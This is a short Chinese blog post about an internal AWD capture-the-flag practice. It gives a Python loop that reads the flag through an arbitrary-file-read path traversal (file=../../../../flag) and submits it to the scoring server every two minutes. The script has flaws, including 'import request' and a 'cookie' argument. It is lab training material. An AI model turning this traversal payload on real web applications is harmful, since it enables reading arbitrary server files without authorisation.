记一次AWD自动获取flag并提交
背景
近期部门内搭建了攻防实验平台供大家练习,周末组织了一波AWD练习,之前都是做渗透测试比较多,加之题目比较简单,找到漏洞getshell拿flag都没问题,只不过如果没找到突破口flag都要手动提交的话,拿分会慢很多。
在过程中发现其实除了getshell后在服务器根目录/下读到flag,其实靶机网站中还存在一个任意文件读取漏洞,那这样写脚本自动flag就简单得多了。
自动提交flag的脚本
#! /usr/bin/env python
# coding: utf-8
import os
import time
import request
url = "http://10.233.*.*:800/admin/Database/downFile.html?type=sql&file=../../../../../../../flag"
while True:
flag = request.get(url,cookie={'skin':'0','PHPSESSID':'18kdkfhsdkfh3323'}).text
print flag
url2 = 'http://10.233.*.*:801/flag_file.php?token=team3&flag=%s' %flag
submit = request.get(url2).text
print submit
time.sleep(60*2) #flag两分钟更新一次
后记
只是想记录一下,flag不一定需要getshell后才能拿到,所以写自动提交flag的脚本也可以是多样的
如果加班只是玩手机、刷微博,那一定是煎熬。如果是坚持的修炼,那一定收益颇丰。